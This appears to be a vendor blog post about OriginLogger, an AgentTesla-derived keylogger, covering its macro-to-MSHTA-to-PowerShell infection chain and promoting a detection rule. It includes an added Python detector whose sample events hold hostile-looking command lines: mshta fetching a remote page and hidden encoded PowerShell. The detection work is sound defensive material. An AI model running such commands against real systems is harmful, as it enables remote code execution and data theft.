OriginLogger Malware Detection: Researchers Shed Light on AgentTesla’s Successor


The malware called OriginLogger is advertised as a fully featured RAT with a user-friendly web panel, a smart logger, and a powerful keyboard hook. Its advertisement also lists multi-language support. The malware strain is designed to run on Windows-based operating systems.

The OriginLogger RAT was promoted as a substitute for another infamous keystroke logger, AgentTesla, after the latter was withdrawn from sale as purportedly legal software because of obvious legal issues.

Detect OriginLogger Malware

To detect malicious files planted in your system by OriginLogger operators, use the IOC-based Sigma rule created by Threat Bounty developer Chayanin Khawsanit:

Detected Dropper activity Lead to Agent Tesla Infection (via file_event)

This detection is available for 26 SIEM, EDR & XDR platforms, aligned with MITRE ATT&CK® framework v.10, addressing the Resource Development and Execution tactics with Develop Capabilities (T1587) and User Execution (T1204) techniques.

Threat Hunters, SOC and CTI Analysts, and Detection Engineers can save time and reduce risks by automating their SOC routine and boosting threat hunting operations with effortless Detection-as-Code content deployment and management. SOC Prime’s field-proven solutions, such as Uncoder CTI, allow you to focus on incident response and other high-priority activities rather than spending volumes of time on detection content research & coding.


OriginLogger Malware Analysis

OriginLogger traces its roots back to the spyware dubbed AgentTesla. According to in-depth research published by Unit 42, OriginLogger is a variant of Agent Tesla, more precisely its third released version, aka “AgentTeslav3”. Agent Tesla, a commercial keylogger and remote access trojan built in .NET, has been in operation since 2014, enabling criminal hackers to gain remote access to breached networks and steal sensitive data.

Both keyloggers are distributed via a fake Microsoft Word document that includes a copy of a random German citizen’s passport, a picture of a credit card, and a number of embedded Excel worksheets. The worksheets carry a VBA macro that fetches and runs the contents of an HTML page on a remote server via MSHTA. The infection chain leaves the victim’s device with obfuscated PowerShell code and two encoded binaries, and the malware then proceeds to harvest the target’s interactions with the compromised device.
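The delivery chain above (Office document, VBA macro, MSHTA fetching a remote page, then PowerShell) leaves a recognisable parent/child process pattern. The following is an added example, not code from the article or from SOC Prime's rule, that applies two behavioural checks to constructed process-creation records modelled on Sysmon Event ID 1 fields; all paths, URLs and command lines are hypothetical sample data.

```python
"""Flag the Office -> mshta.exe -> powershell.exe chain in process-creation events."""
import re
from typing import Optional

# Office hosts that should not normally spawn mshta.exe
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
# PowerShell's -EncodedCommand switch and its accepted abbreviations
ENCODED_PS = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> Optional[str]:
    """Return a finding label for one process-creation event, or None if benign."""
    parent = basename(event["ParentImage"])
    image = basename(event["Image"])
    cmd = event.get("CommandLine", "")
    # Stage 1 of the chain: the macro launches MSHTA against a remote HTML page
    if parent in OFFICE_PARENTS and image == "mshta.exe" and REMOTE_URL.search(cmd):
        return "office_spawned_mshta_remote"
    # Stage 2: the fetched page runs obfuscated/encoded PowerShell
    if parent == "mshta.exe" and image in {"powershell.exe", "pwsh.exe"} and ENCODED_PS.search(cmd):
        return "mshta_spawned_encoded_powershell"
    return None


def hunt(events: list) -> list:
    """Run classify() over a list of events and return (index, label) hits."""
    hits = []
    for i, event in enumerate(events):
        label = classify(event)
        if label:
            hits.append((i, label))
    return hits


# Constructed sample events (hypothetical, not real telemetry)
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://example.invalid/page.html"},
    {"ParentImage": r"C:\Windows\System32\mshta.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"ParentImage": r"C:\Windows\explorer.exe",  # benign: local HTA, no Office parent
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe C:\Users\u\local.hta"},
]

if __name__ == "__main__":
    for idx, label in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: {label}")
```

Run against real telemetry, the two labels would be correlated by host and time window; a lone Office-to-mshta hit is worth triaging even without the second stage.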

Browse through the vast library of detection content to find other relevant algorithms and detect whether your system is infected with malicious files. Are you a professional threat hunter striving to share your expertise with the world’s largest cybersecurity community? Join our crowdsourcing initiative for continuous rewards and recognition with the Threat Bounty program.
